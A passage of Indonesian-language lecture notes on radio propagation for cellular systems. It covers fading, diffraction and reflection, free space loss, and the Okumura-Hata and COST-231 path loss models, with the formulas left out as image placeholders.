Pemodelan ini berdasarkan pendekatan analitis dan digunakan untuk analisis coverage serta perencanaan sel secara detail.

4. Model Variabilitas lokal :
a. Distribusi Rayleigh
b. Distribusi Rician
c. Distribusi Normal
d. Joint Probability Techniques

Berdasarkan pendekatan statistik dan digunakan untuk analisis fluktuasi sinyal secara mikroskopik. Pada diktat ini akan dijelaskan pemodelan propagasi secara analisis sederhana dan pemodelan secara area. Dengan kedua tool ini cukup memberikan gambaran secara umum hal-hal yang perlu diperhatikan dalam perencaaan sistem radio selular dan juga link microwave.
Fenomena dari propagasi gelombang di medium dapat dijelaskan sebagai berikut berdasarkan macam-macam objek yang mempengaruhinya :

    • Lingkungan, menyebabkan terjadinya efek :
      - Refleksi : terjadi jika sinyal mengenai objek yang mempunyai dimensi lebih besar dibandingkan panjang gelombang sinyal. Refleksi bisa bersifat konstruktif dan juga destruktif
      - Difraksi : terjadi jika sinyal mengenai objek yang mempunyai bentuk yang tajam.
      - Scattering : terjadi jika sinyal mengenai objek yang mempunyai dimensi lebih kecil dibandingkan panjang gelombang sinyal. Menyebabkan energy menyebar kesegala arah.
    • Atmosphere bumi, menyebabkan terjadinya efek :
      - Refleksi dari lapisan ionosfer bumi, diabaikan dalam wireless cellular system
      - Attenuasi akibat hujan, bukan faktor utama dalam wireless cellular system
      - Difraksi, refleksi, hamburan dan ducting, dapat terjadi pada wireless cellular system

image

Fading merupakan gejala yang dirasakan oleh penerima akibat adanya fluktuasi level daya sinyal yang diterima oleh receiver. Dilihat dari penyebab fading ini dapat dibagi menjadi dua kategori yaitu :

· Multipath, terjadi karena terdapat objek antara pengirim dan penerima sehingga gelombang yang sampai ke penerima berasal dari beberapa
lintasan (multipath). Akibat adanya fenomena ini menyebabkan efek :
- Fading, yaitu fluktuasi sinyal di penerima
- Delay Spread, yaitu distribuai time delay dari masing-masing path yang dapat menyebabkan ISI (Inter Symbol Interference). Analisa efek fading akibat multipath (Fast fading) ini dapat didekati dengan beberapa distribusi level, antara lain :
- Rician, jika sinyal yang dominan sampai ke penerima adalah sinyal yang bersifat Line Of Sight (direct path).
- Rayleigh, jika sinyal yang dominan sampai ke penerima adalah sinyal yang bersifat tidak langsung (indirect path).

· Shadowing, terjadi karena adanya efek terhalangnya sinyal sampai ke penerima akibat oleh gedung bertingkat, tembok, dll. Fluktuasi sinyal akibat shadowing ini adalah bersifat lambat (Slow Fading). Pandekatan yang dapat dilakukan untuk menganalisis efek shadowing ini adalah dengan menggunakan distribusi log normal.
Berikut ini akan dijelaskan metoda perhitungan loss untuk analisis yang sederhana :
- Free Space Loss, Diasumsikan propagasi hanya terjadi pada satu lintasan dan tidak terjadi refleksi serta zone ke-1 Fresnell harus bebas halangan. Free Space Loss terjadi akibat adanya penyebaran daya yang diradiasikan oleh antenna transmitter.Faktor yang mempengaruhi adalah frekuensi dan jarak lintasan gelombang.

image

Difraksi, jika antara antena Base Station dengan antena Mobile Station terhalang oleh suatu obstacles (Gedung, bukit, dll), maka MS masih dapat menerima sinyal dimana penurunan sinyalnya terhadap hubungan LOS dinyatakan dengan paramater difraksi v. Penambahan Loss yang terjadi akibat adanya difraksi merupakan fungsi dari parameter difraksi v

image

image

Refleksi, Terjadi jika sudut kedatangan sinyal langsung dan sinyal pantul kecil, dimana koefisien refleksi =1 dan refleksi menyebabkan phase gelombang berubah 1800.

image

Pada pemodelan loss propagasi berdasarkan karaketeristik area dapat dianalisis menggunakan pendekatan :
1. Model Okumura-Hatta
2. Model COST-231 (Walfisch-Ikegami)
Penjelasan dari masing-masing model adalah sebagai berikut :

Model Okumura-Hatta
Pemodelan Okumura-Hata merupakan formula empirik untuk estimasi mean path loss propagasi sinyal berdasarkan hasil pengukuran Okumura terhadap propagasi sinyal di kota Tokyo. Oleh Hata hasil pengukuran tersebut didekati dengan suatu formula umum untuk lokasi urban dan beserta beberapa pengkoreksiannya. Pendekatan ini dipakai luas di Eropa dan Amerika Utara untuk desain sistem pada band 800 Mhz
900 MHz. Dari hasil penelitian yang ada harga path loss dari pendekatan ini untuk daerah urban di Inggris, Kanada dan Amerika Serikat mempunyai harga 10 dB lebih rendah, tetapi untuk daerah suburban cukup sesuai.
Perhitungan Path Loss berdasarkan kriteria :

image

image

Model COST-231 / Walfisch-Ikegami (WIM)

Model ini adalah hasil dari penelitian dibawah badan Cooperation Scientific and Technical Research (COST) dengan kode project COST-231, yang kemudian diadopsi oleh ITU untuk standard selular dan PCS. Pemodelan COST-231 atau disebut juga pemodelan Walfisch-Ikegami adalah kombinasi antara model empiris dan semideterministik untuk estimasi mean path loss
pada daerah urban.
Model ini cukup baik untuk estimasi path loss dengan frekuensi operasi 800
2000 MHz dan jarak tempuh 0.02 5 km.
Pada aplikasinya dapat digunakan pada sistem GSM dan CDMA jika ingin memasukkan unsur tambahan tinggi gedung rata-rata, separasi antar gedung lebar jalan, sudut kedatangan sinyal terhadap jalan.

image

image

image

Read More …